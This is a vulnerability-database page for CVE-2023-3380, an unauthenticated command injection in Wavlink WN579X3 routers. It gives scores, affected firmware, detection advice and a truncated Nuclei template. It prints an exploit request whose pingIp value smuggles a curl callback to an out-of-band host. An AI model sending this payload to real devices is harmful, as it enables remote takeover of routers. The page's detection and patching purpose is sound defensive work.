CVE-2023-3380
published 2023-06-23CVE-2023-3380: A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the…
PriorityP271critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.88%
88.9th percentile
A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the component Ping Test. The manipulation of the argument pingIp leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232236. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavlink | wn579x3 | — | — |
| wavlink | wn579x3_firmware | <= 2023-06-15 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /cgi-bin/adm.cgi HTTP/1.1
commandpage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
path/ping.shtml
- →Fingerprint target by checking for WAVLINK-specific strings in the HTTP response body before attempting exploitation.
- →Detect exploitation attempts by monitoring POST requests to /cgi-bin/adm.cgi with the parameter 'pingIp' containing shell metacharacters (e.g., semicolons, encoded as %3B) indicative of command injection.
- →Alert on POST requests to /cgi-bin/adm.cgi with Content-Type: application/x-www-form-urlencoded and body containing 'page=ping_test' combined with shell injection characters in the pingIp parameter.
- →Use Shodan to identify exposed WAVLINK WN579X3 devices for proactive asset discovery and patching prioritization.
- →The vulnerability is unauthenticated (PR:N), so any external IP can trigger it — monitor for unexpected outbound connections (e.g., curl/wget) originating from the router process after a POST to adm.cgi.
- ·The exploit payload uses an out-of-band interaction (interactsh) to confirm RCE; detection based solely on HTTP response status 200 is insufficient — OOB callback monitoring is required for reliable confirmation.
- ·The vulnerability affects Wavlink WN579X3 firmware up to version 20230615; devices on this or earlier firmware versions are confirmed vulnerable.
- ·The Nuclei template uses a two-step flow: first confirming the target is a WAVLINK device, then sending the exploit — single-step detections without the fingerprint check may produce false positives.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.8MEDIUMAV:N/AC:L/Au:M/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WAVLINK WN579X3 - Remote Command Execution
nuclei·CVSS 9.8
CVE-2023-3380 [CRITICAL] WAVLINK WN579X3 - Remote Command Execution
WAVLINK WN579X3 - Remote Command Execution
Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
Template:
id: CVE-2023-3380
info:
name: WAVLINK WN579X3 - Remote Command Execution
author: pussycat0x
severity: critical
description: |
Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
impact: |
Unauthenticated attackers can execute arbitrary commands through the pingIp parameter in the adm.cgi endpoint, potentially compromising the entire WAVLINK router and intercepting network traffic.
remediation: |
Update WAVLINK WN579X3 firmware to a patched version that properly sanitizes the pingIp parameter and prevents command injection in adm.cgi.
reference:
- https://github.com/sleepyv
2023-06-23
Published